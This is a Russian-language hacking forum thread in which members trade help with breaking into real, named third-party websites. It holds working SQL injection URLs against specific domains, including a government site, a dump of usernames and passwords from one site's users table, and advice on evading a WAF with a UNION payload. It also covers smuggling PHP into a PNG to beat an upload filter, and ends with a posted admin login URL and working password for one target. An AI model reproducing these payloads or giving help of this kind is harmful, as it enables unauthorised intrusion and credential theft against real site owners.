Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Нашел такое www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1
    это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"test@mail.ru","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) в параметре cb= можно прописать любой html код,например (<input name="txt_email20" type="text" class="input_login">) то он исполнится ,и будет выглядеть так

    тут будет форма
    ({"email":"test@mail.ru","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"})

    И ява скрипты не исполняются почему то.

    Что можно с этим сделать?
     
    #441 djon, 10 Aug 2015
    Last edited: 10 Aug 2015
  2. Pro100Nyan

    Pro100Nyan New Member

    Joined:
    15 Mar 2013
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Актуально...
     
  3. Chudak

    Chudak New Member

    Joined:
    7 Aug 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Code:
    ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version(),1,1)))='53
    
    version 5.1.72-cll-lve
    Помогите. WAF фильтрует information_schema.tables. Как обойти?
     
  4. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?
    Code:
    http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    https://rdot.org/forum/showthread.php?t=156
     
    _________________________
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Скорее всего возвращаемый content-type - text/json, XSS там не выполнить. Я бы обратил внимание на возможные получения данных и CSRF.

    Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?

    Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы :)
     
    #446 randman, 11 Aug 2015
    Last edited: 11 Aug 2015
    Chudak likes this.
  7. Pro100Nyan

    Pro100Nyan New Member

    Joined:
    15 Mar 2013
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    которые dns, те что сайты)
     
  8. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    Нашел вот такую уязвимость
    Code:
    http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9+--

    Нашел username,password но админку так и не смог найти((
    Code:
    http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FROM+users+LIMIT+0,1+--

    Записать файл не получается.

    Что нибудь можно тут сделать? Помогите начинающему
     
  9. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,091
    Likes Received:
    526
    Reputations:
    173
    http://www.oscar-k.dk/content/index.php?signIn=1
     
  10. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    135
    Likes Received:
    5
    Reputations:
    0
    В админке сайта есть скрипт elFinder.
    Пытаюсь через него загрузить php файл.
    Скрипт, походу, читает заголовки mime т.к.
    Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
    <?php echo "1";?> не пропустит.
    Но если изображение переименовать в test.php то с легкостью загружает.
    Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?

    Если файл test.php переименовать в test.jpg не пропускает так же...
     
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    опередил) у него ещё wildcard как то хитро настроен, по идее ещё есть
    phpmyadmin.oscar-k.dk
    content.oscar-k.dk
    ftp://ftp.oscar-k.dk
     
    _________________________
    blackhead likes this.
  12. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    212
    Likes Received:
    52
    Reputations:
    116
    Проверьте, не фильтрует ли конструкцию
    <? eval('echo 1;');
    вообщем, нужно выяснить, на какие символы ругается waf
     
  13. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    135
    Likes Received:
    5
    Reputations:
    0
    Он фильтрует не содержимое файла, без разницы что там, eval или echo.
    Он фильтрует заголовки
    код типа пропустил но выполнить не удалось
    Code:
    ‰PNG
       
    IHDR       ђwSЮ       pHYs     љњ   tIMEЯ
    ’ьdп   IDATЧcшяя? ююЬМYз    IEND®B`‚
    <?php
    echo 'hello'; ?>
    
     
  14. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((

    PS
    Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
     
    #454 blackhead, 11 Aug 2015
    Last edited: 11 Aug 2015
  15. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,091
    Likes Received:
    526
    Reputations:
    173
    софт со своим словарём.
     
    blackhead and makag like this.
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    http://content.oscar-k.dk/index.php?signIn=1
    seba:12345
     
    _________________________
    blackhead likes this.
  17. Chudak

    Chudak New Member

    Joined:
    7 Aug 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
     
  18. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    Спасибо, но хотелось бы знать что откуда. Если не трудно хотя-бы вкратце - как найти админку и откуда seba:12345 (в базе я нашел только юзера oscar).
     
  19. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    447
    Likes Received:
    80
    Reputations:
    20
  20. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Code:
    place=1')sub2 WHERE 1.0Union/*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20--+
    
    Инъекция в table_references.
     
    kingbeef, Br@!ns and Chudak like this.
Loading...